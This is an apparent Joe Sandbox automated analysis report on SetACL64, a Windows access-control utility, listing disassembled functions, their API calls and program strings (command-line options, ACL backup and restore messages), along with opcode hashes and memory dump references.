                                                  • Opcode Fuzzy Hash: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                                  • Instruction Fuzzy Hash: A3219D61A0868284EF14EF17D54C3B9A762AB49BA4FD25431CA0D066E7EFECD444C360
                                                  APIs
                                                    • Part of subcall function 00007FF7C1753FE0: GetLastError.KERNEL32(?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000,00007FF7C175D70B,?,?,?), ref: 00007FF7C1753FEF
                                                    • Part of subcall function 00007FF7C1753FE0: SetLastError.KERNEL32(?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000,00007FF7C175D70B,?,?,?), ref: 00007FF7C175408D
                                                  • CloseHandle.KERNEL32(?,?,00000000,00007FF7C174E709,?,?,?,?,00007FF7C171EA35), ref: 00007FF7C174E5A3
                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF7C174E709,?,?,?,?,00007FF7C171EA35), ref: 00007FF7C174E5B9
                                                    • Part of subcall function 00007FF7C1758230: try_get_function.LIBVCRUNTIME ref: 00007FF7C175824E
                                                  • ExitThread.KERNEL32 ref: 00007FF7C174E5C2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
                                                  • String ID:
                                                  • API String ID: 1393601959-0
                                                  • Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                                  • Instruction ID: 4af79ae36e2d8b7acac073c358fd5429f56f9a370f75f87e5a73e67f33ea0cf1
                                                  • Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                                  • Instruction Fuzzy Hash: F8F04421B08A4642EB147F22845417CE7649F49B74FA84735D63C022D6FFBCD45583B0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                                  • Instruction ID: 7fee82db3e1f6777f624650ec458a9ff62394c2764442af9c27a26cb482abcec
                                                  • Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                                  • Instruction Fuzzy Hash: A3E04F20B18B0982EB14BF3798A527D6292AF8D721F408538C80E03373CDBEE4498320
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: StartLoggerThreadProc: arg0==NULL
                                                  • API String ID: 3668304517-2114133805
                                                  • Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                                  • Instruction ID: 4bb5c715dd298b27ff2217d8de8872b62e7bde72550a01cceba44ff7e38e57aa
                                                  • Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                                  • Instruction Fuzzy Hash: 3E415C7271468681EF45AF2AD48836DA362EF88B98FD14036DA4D07A6ADFACD4908350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: AppPolicyGetThreadInitializationType
                                                  • API String ID: 2742660187-3350320272
                                                  • Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                                  • Instruction ID: bace5d640c15720a3fa5d02e36ff48fb20608cd74a556d4921be23626f82ea21
                                                  • Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                                  • Instruction Fuzzy Hash: 7CE04F51E0990691FB06AF93A8101B092119F0C370EC89336D93C0A3E29FBC99D9C7A0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                                  • Instruction ID: 233eaa671624e01a41c89b8e7e366f45671a3bc886ebe47de2c3e3622dee9812
                                                  • Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                                  • Instruction Fuzzy Hash: 7731CA21A18F4682D760AF178564179B660FB497B0FA80339DBAE073E1CF78E471C312
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread
                                                  • String ID:
                                                  • API String ID: 1611280651-0
                                                  • Opcode ID: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                                  • Instruction ID: 8ea9b533cb800909ffebd8f509bff697dd3973e7dfac36933421996400818d68
                                                  • Opcode Fuzzy Hash: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                                  • Instruction Fuzzy Hash: 7FF03015F09A4682EF14BF73981917CE2A09F5DB34F948434D90A433A3EF6C98558720
                                                  APIs
                                                  • TlsFree.KERNELBASE(?,?,?,00007FF7C17533F9,?,?,?,00007FF7C175371D,?,?,?,?,?,?,00007FF7C1752F93), ref: 00007FF7C1753645
                                                  Similarity
                                                  • API ID: Free
                                                  • String ID:
                                                  • API String ID: 3978063606-0
                                                  • Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                                  • Instruction ID: d65574ae27d0aa832cb872b65c3331c161c3c462e42a0c2a24fb1e475b5d959d
                                                  • Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                                  • Instruction Fuzzy Hash: CC316C22B04F4981AB10AF17E460169A3A0E74CFF4B989636DF6D0BBA5CF7CD4928350
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C174E258
                                                    • Part of subcall function 00007FF7C174892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C17488D9), ref: 00007FF7C1748935
                                                    • Part of subcall function 00007FF7C174892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C17488D9), ref: 00007FF7C174895A
                                                  Similarity
                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 4036615347-0
                                                  • Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                                  • Instruction ID: ac51dcf6cce31e023fb81c41b260e88b60d4fdaf157d2e8982e063a5be090be3
                                                  • Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                                  • Instruction Fuzzy Hash: 0A219F31A0DB1286F715BFA69511239E691AF48BB0F858634DE9C07BC7DFBCE8014B20
                                                  APIs
                                                  Similarity
                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                  • String ID:
                                                  • API String ID: 3947729631-0
                                                  • Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                                  • Instruction ID: 9abaaf4855ea88a14923a7a6f6e9a40a45d9c4f640d855f7c694675896f9a37d
                                                  • Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                                  • Instruction Fuzzy Hash: D0218032E04B05C9EB11EF65C4942ED77A1EB48718F84853AD61D02A96DFB8D485CBA0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                                  • Instruction ID: 8a03b74f3c7984448cde599b3336377d66e3bca58c7a4caef3777aca393149c4
                                                  • Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                                  • Instruction Fuzzy Hash: 3B115832A1CA4282F310AF56E550169E3A5FB4D7A0F854134E65D476A7CEBCE8218B60
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                                  • Instruction ID: ffa018c66b1c0ab62c6575403b69904a67bc4f4f3d934b29ba2162bd7b5c6d86
                                                  • Opcode Fuzzy Hash: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                                  • Instruction Fuzzy Hash: 1411E472A14B569DEB10EFA1D4812ED37B8FB0836CF900636EA4D16B5ADF74C194C7A0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                                  • Instruction ID: e3e48e263a7e149cce940042e08a344c08ab822f3b8fcee2a6a2498831e1b29b
                                                  • Opcode Fuzzy Hash: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                                  • Instruction Fuzzy Hash: BB11D672A11F559CEB11DFA1E8404DC37B8FB183ACB900635EA5D12B59EF74C1A5C790
                                                  APIs
                                                    • Part of subcall function 00007FF7C1755094: RtlAllocateHeap.NTDLL(?,?,?,00007FF7C175BCE1,?,?,00000000,00007FF7C175D70B,?,?,?,00007FF7C17534C7,?,?,?,00007FF7C17533BD), ref: 00007FF7C17550D2
                                                  • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF7C175D70B,?,?,?,00007FF7C17534C7,?,?,?,00007FF7C17533BD,?,?,?,00007FF7C175378E), ref: 00007FF7C175BD31
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 9cdcd61cdf70f904c49f21d180333aab02995e45e4132c0ba3bc39a00b87e90c
                                                  • Instruction ID: 6f7f1871edc7f03eb248e9ca11bcfee8693d3277a653a50d2a893e75ca8c2a14
                                                  • Opcode Fuzzy Hash: 9cdcd61cdf70f904c49f21d180333aab02995e45e4132c0ba3bc39a00b87e90c
                                                  • Instruction Fuzzy Hash: 6801E810E0DA4780FB95BF6755612B991525F8D7B0FC88231EE2E472D7EDBCE4404225
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7C175403D,?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000), ref: 00007FF7C1755031
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                                  • Instruction ID: 8d7a6f1b6a23194ec2b687de9ab5b63070eb1d575176e41206ce048ef144f568
                                                  • Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                                  • Instruction Fuzzy Hash: 80F03714B0AA0781FF547EA799252B582805F4DBA0FCC5031C90E86793EDBCA4814270
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,?,00007FF7C175BCE1,?,?,00000000,00007FF7C175D70B,?,?,?,00007FF7C17534C7,?,?,?,00007FF7C17533BD), ref: 00007FF7C17550D2
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                                  • Instruction ID: bec5f7d43bf05c93e0c4607ca598c4b596a99968609605b3eb1fc371d60ae75d
                                                  • Opcode Fuzzy Hash: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                                  • Instruction Fuzzy Hash: CDF0FE10B09A07C5FB947EB35961279D2815F4D7B0FD88630DD2E862C3DDBCE8808171
                                                  APIs
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                                  • Instruction ID: 91325de472e8dd725f095c479e88ee92f4869fc36a49da94d5acd92c76b856d7
                                                  • Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                                  • Instruction Fuzzy Hash: 89F05E31D0864285FB51FF16E8513B5A3A0FF4D324FC00032C54D46262DE6DE0158F60
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$SimpleString::operator=$ErrorLast$Information$Delete$DescriptorSecurity$Valid$ControlConvertEqualFreeLocalString
                                                  • String ID: DACL$ DACL: [error:$ Group: $ Group: [NULL]$ Group: [empty]$ Group: [error:$ Owner: $ Owner: [NULL]$ Owner: [empty]$ Owner: [error:$ SACL$ SACL: [error:$(not_protected$(protected$(pseudo_protected$+auto_inherited)$: $: [NULL]$: [empty]$:[NULL]$:[empty]$:[error:$> because a filter keyword matched.$> failed with: $> has a NULL security descriptor (granting full control to everyone) and is being ignored.$DACL$Group:$Group:[NULL]$Group:[empty]$Group:[error:$ListSD$Omitting ACL of: <$Owner:$Owner:[NULL]$Owner:[empty]$Owner:[error:$Parsing the SD of <$SACL$The object <
                                                  • API String ID: 503136041-36202760
                                                  • Opcode ID: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
                                                  • Instruction ID: d2ac2f4798ae3649999505ea34374ac1d6804de63142b37175af5120d911c3e0
                                                  • Opcode Fuzzy Hash: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
                                                  • Instruction Fuzzy Hash: 5453A462A097C295EB20EF26D8443EDA360EB49368FD04131D65D476EBDFBCE689C350
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Type 'SetACL -help' for help.$ could not be processed!$ could not be set!$ in a parameter option -ace specified: $ in a parameter option -dom specified: $ in a parameter option -lst specified: $ in a parameter option -op specified: $ in a parameter option -os specified: $ in a parameter option -trst specified: $-ace$-actn$-bckp$-clr$-dom$-fltr$-grp$-help$-ignoreerr$-log$-lst$-on$-op$-os$-ot$-ownr$-raw$-rec$-rst$-silent$-trst$> in a parameter option -ace specified: $> in a parameter option -dom specified: $> in a parameter option -grp specified: $> in a parameter option -lst specified: $> in a parameter option -op specified: $> in a parameter option -ownr specified: $> in a parameter option -trst specified: $ERROR (internal) while processing command line: Action: $ERROR (internal) while processing command line: Action: CLEARDACL could not be set!$ERROR (internal) while processing command line: Action: CLEARSACL could not be set!$ERROR (internal) while processing command line: Action: DELORPHANEDSIDS could not be set!$ERROR (internal) while processing command line: Action: RESETCHILDPERMS could not be set!$ERROR (internal) while processing command line: Action: SETINHFROMPAR could not be set!$ERROR (internal) while processing command line: Backup/Restore file: $ERROR (internal) while processing command line: list options: $ERROR (internal) while processing command line: object flags: $ERROR (internal) while processing command line: orphaned SID deletion options: $ERROR (internal) while processing command line: recursion type could not be set!$ERROR in command line: Invalid ACL type (where) entry $ERROR in command line: Invalid access mode entry $ERROR in command line: Invalid action specified: $ERROR in command line: Invalid domain action entry $ERROR in command line: Invalid entry <$ERROR in command line: Invalid inheritance entry $ERROR in command line: Invalid input file (csv) entry in a parameter option -trst specified: $ERROR in command line: Invalid list format entry $ERROR in command line: Invalid list what entry $ERROR in command line: Invalid number of entries in parameter for option -op specified: $ERROR in command line: Invalid object type specified: $ERROR in command line: Invalid option specified: $ERROR in command line: Invalid parameter for option -clr specified: $ERROR in command line: Invalid parameter for option -rst specified: $ERROR in command line: Invalid protection entry $ERROR in command line: Invalid recursion type specified: $ERROR in command line: Invalid trustee action entry $ERROR in command line: No parameter found for option $ERROR while processing command line: ACE: $ERROR while processing command line: Domain: $ERROR while processing command line: Owner: $ERROR while processing command line: Trustee file: $ERROR while processing command line: Trustee: $ERROR while processing command line: object (name, type): $ERROR while processing command line: primary group: $INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that requ$ProcessCmdLine$WARNING: The parameter <%s> contains a double quotation mark (". Did you unintentionally escape a double quote? Hint: use <"C:\\">$ace$aud_fail$aud_fail,aud_succ$aud_succ$aud_succ,aud_fail$clear$cont$cont_obj$cpydom$cpytrst$csv$dacl$dacl,sacl$delorphanedsids$deny$domain$file$grant$list$obj$own$p_c$p_nc$prn$reg$remdom$remtrst$repldom$repltrst$restore$revoke$rstchldrn$sacl$sacl,dacl$sddl$set$setgroup$setowner$setprot$shr$srv$tab$trustee$wmi$yes
                                                  • API String ID: 0-425451505
                                                  • Opcode ID: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
                                                  • Instruction ID: 1a550e23831c1b2226f35cb1fc20134a6e09d52c0896bc018e772e68017005a5
                                                  • Opcode Fuzzy Hash: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
                                                  • Instruction Fuzzy Hash: A3D33261A5978294EB20FF62DC512F9A360FF99364FC11032D50E4BADBEEACD645C360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                  • API String ID: 667068680-295688737
                                                  • Opcode ID: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                                                  • Instruction ID: ae664a0ba7b937bf104544c2aa0c5fea8c1b444ccc4b6a3ac8d1ea9fd0873748
                                                  • Opcode Fuzzy Hash: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                                                  • Instruction Fuzzy Hash: D8A180A4A19B0791EB04EF66BC58468B7A5BB0E7A5FC45031C84D47326EFBDE19DC320
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_taskDescriptorFreeLocalSecurity$ConvertString
                                                  • String ID: " $> because a filter keyword matched.$> because neither owner, group, DACL nor SACL were backed up.$> failed with: $>: $DoActionRestore$Input file for restore operation opened: '$Omitting SD of: <$Restoring SD of <$Restoring SD of: <$Writing SD to <
                                                  • API String ID: 143920484-3190023557
                                                  • Opcode ID: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
                                                  • Instruction ID: 0302c7a944a7feb35b374ce3ec547d8c1c91983fad989663a949c6bea3e1f089
                                                  • Opcode Fuzzy Hash: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
                                                  • Instruction Fuzzy Hash: 6FF2A372A04B8185EB20AF76D8403ED6361FB487B8F905231EA5D47AEADFBCD585C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Valid$ErrorLast$DeleteInformation
                                                  • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                                                  • API String ID: 2636496183-3371799133
                                                  • Opcode ID: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
                                                  • Instruction ID: fd9e01890ddf05ce178a24b5f8a414f88d95fb750e8f0c9f95e2646023d68b7d
                                                  • Opcode Fuzzy Hash: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
                                                  • Instruction Fuzzy Hash: 3E827162B1878285EB10AF6AD4443ADA361FB497B8FD04235DA5D47BDADFBCE190C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocString$DescriptorSecurityValid_invalid_parameter_noinfo_noreturn
                                                  • String ID: GetSD$SetSD$__systemsecurity$__systemsecurity=@$t5x$$x$2z$w
                                                  • API String ID: 1218313072-3940533286
                                                  • Opcode ID: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                                                  • Instruction ID: f06402369aaa7f097f833a8a59561b750d9e82f58d50f318d0e99dc7ae0f9426
                                                  • Opcode Fuzzy Hash: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                                                  • Instruction Fuzzy Hash: A6F18936B09B0286EB54EF26E4553ACB3A0EF48B64F944435CA4D83B96DFBCD454C360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
